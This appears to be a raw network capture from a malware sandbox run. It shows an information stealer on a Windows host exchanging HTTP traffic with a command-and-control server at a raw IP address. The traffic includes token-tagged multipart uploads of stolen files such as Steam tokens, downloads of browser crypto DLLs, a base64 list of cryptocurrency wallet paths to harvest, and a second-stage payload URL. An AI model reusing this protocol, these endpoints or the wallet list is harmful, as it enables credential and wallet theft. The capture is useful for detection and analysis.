Oct 2, 2024 09:41:23.902071953 CEST	562	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCGHCBKFCFBFHIDHDBFC Host: 46.8.231.109 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 36 64 30 65 31 36 61 38 66 65 66 30 63 66 64 34 30 30 36 39 66 37 65 33 64 32 62 35 66 36 30 30 65 31 65 65 39 32 35 34 37 35 37 30 39 65 66 37 34 38 39 38 33 36 35 64 37 37 32 35 30 33 61 62 32 61 62 62 37 37 32 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="token"86d0e16a8fef0cfd40069f7e3d2b5f600e1ee925475709ef74898365d772503ab2abb772------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="file"------GCGHCBKFCFBFHIDHDBFC--
Oct 2, 2024 09:41:24.117491007 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 09:41:24.346239090 CEST	91	OUT	GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Oct 2, 2024 09:41:24.521246910 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:24 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "a7550-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Oct 2, 2024 09:41:25.185429096 CEST	91	OUT	GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Oct 2, 2024 09:41:25.361063004 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:25 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "94750-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Oct 2, 2024 09:41:25.780237913 CEST	92	OUT	GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Oct 2, 2024 09:41:25.955779076 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:25 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "6dde8-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Oct 2, 2024 09:41:26.285604000 CEST	88	OUT	GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Oct 2, 2024 09:41:26.461803913 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:26 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "1f3950-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Oct 2, 2024 09:41:27.891187906 CEST	92	OUT	GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Oct 2, 2024 09:41:28.066554070 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:27 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "3ef50-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Oct 2, 2024 09:41:28.286799908 CEST	96	OUT	GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Oct 2, 2024 09:41:28.462948084 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:28 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "13bf0-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Oct 2, 2024 09:41:28.849953890 CEST	200	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJKFBAFIDAEBFHJKJEBF Host: 46.8.231.109 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Oct 2, 2024 09:41:29.174886942 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 09:41:29.307133913 CEST	466	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJKJKFCBKKJDGDHIDBGI Host: 46.8.231.109 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4b 46 43 42 4b 4b 4a 44 47 44 48 49 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 36 64 30 65 31 36 61 38 66 65 66 30 63 66 64 34 30 30 36 39 66 37 65 33 64 32 62 35 66 36 30 30 65 31 65 65 39 32 35 34 37 35 37 30 39 65 66 37 34 38 39 38 33 36 35 64 37 37 32 35 30 33 61 62 32 61 62 62 37 37 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4b 46 43 42 4b 4b 4a 44 47 44 48 49 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4b 46 43 42 4b 4b 4a 44 47 44 48 49 44 42 47 49 2d 2d 0d 0a Data Ascii: ------KJKJKFCBKKJDGDHIDBGIContent-Disposition: form-data; name="token"86d0e16a8fef0cfd40069f7e3d2b5f600e1ee925475709ef74898365d772503ab2abb772------KJKJKFCBKKJDGDHIDBGIContent-Disposition: form-data; name="message"wallets------KJKJKFCBKKJDGDHIDBGI--
Oct 2, 2024 09:41:29.485987902 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:29 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Oct 2, 2024 09:41:29.488054037 CEST	464	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHDHDBAECGCAFHJJDAKF Host: 46.8.231.109 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 48 44 48 44 42 41 45 43 47 43 41 46 48 4a 4a 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 36 64 30 65 31 36 61 38 66 65 66 30 63 66 64 34 30 30 36 39 66 37 65 33 64 32 62 35 66 36 30 30 65 31 65 65 39 32 35 34 37 35 37 30 39 65 66 37 34 38 39 38 33 36 35 64 37 37 32 35 30 33 61 62 32 61 62 62 37 37 32 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 44 42 41 45 43 47 43 41 46 48 4a 4a 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 44 42 41 45 43 47 43 41 46 48 4a 4a 44 41 4b 46 2d 2d 0d 0a Data Ascii: ------GHDHDBAECGCAFHJJDAKFContent-Disposition: form-data; name="token"86d0e16a8fef0cfd40069f7e3d2b5f600e1ee925475709ef74898365d772503ab2abb772------GHDHDBAECGCAFHJJDAKFContent-Disposition: form-data; name="message"files------GHDHDBAECGCAFHJJDAKF--
Oct 2, 2024 09:41:29.669231892 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 09:41:29.844616890 CEST	562	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIJJKKJJDAAAAAKFHJJD Host: 46.8.231.109 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 36 64 30 65 31 36 61 38 66 65 66 30 63 66 64 34 30 30 36 39 66 37 65 33 64 32 62 35 66 36 30 30 65 31 65 65 39 32 35 34 37 35 37 30 39 65 66 37 34 38 39 38 33 36 35 64 37 37 32 35 30 33 61 62 32 61 62 62 37 37 32 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------GIJJKKJJDAAAAAKFHJJDContent-Disposition: form-data; name="token"86d0e16a8fef0cfd40069f7e3d2b5f600e1ee925475709ef74898365d772503ab2abb772------GIJJKKJJDAAAAAKFHJJDContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------GIJJKKJJDAAAAAKFHJJDContent-Disposition: form-data; name="file"------GIJJKKJJDAAAAAKFHJJD--
Oct 2, 2024 09:41:30.044239044 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 09:41:30.323353052 CEST	471	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAFIEBKKJJDAKFHIDBFH Host: 46.8.231.109 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 41 46 49 45 42 4b 4b 4a 4a 44 41 4b 46 48 49 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 36 64 30 65 31 36 61 38 66 65 66 30 63 66 64 34 30 30 36 39 66 37 65 33 64 32 62 35 66 36 30 30 65 31 65 65 39 32 35 34 37 35 37 30 39 65 66 37 34 38 39 38 33 36 35 64 37 37 32 35 30 33 61 62 32 61 62 62 37 37 32 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 45 42 4b 4b 4a 4a 44 41 4b 46 48 49 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 45 42 4b 4b 4a 4a 44 41 4b 46 48 49 44 42 46 48 2d 2d 0d 0a Data Ascii: ------CAFIEBKKJJDAKFHIDBFHContent-Disposition: form-data; name="token"86d0e16a8fef0cfd40069f7e3d2b5f600e1ee925475709ef74898365d772503ab2abb772------CAFIEBKKJJDAKFHIDBFHContent-Disposition: form-data; name="message"ybncbhylepme------CAFIEBKKJJDAKFHIDBFH--
Oct 2, 2024 09:41:30.519325972 CEST	399	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:30 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 172 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 30 4e 79 34 30 4e 53 34 30 4e 43 34 78 4d 44 51 76 62 47 52 74 63 79 38 32 4e 6d 5a 69 5a 6d 4e 6a 5a 44 67 7a 4e 32 46 6a 58 33 5a 68 5a 47 64 6e 5a 48 4e 68 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 48 78 6f 64 48 52 77 4f 69 38 76 4d 54 51 33 4c 6a 51 31 4c 6a 51 30 4c 6a 45 77 4e 43 39 73 5a 47 31 7a 4c 7a 59 32 5a 6d 4a 6d 59 32 4d 35 4f 54 59 7a 59 32 46 66 62 47 52 6d 63 32 35 68 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 48 77 3d Data Ascii: 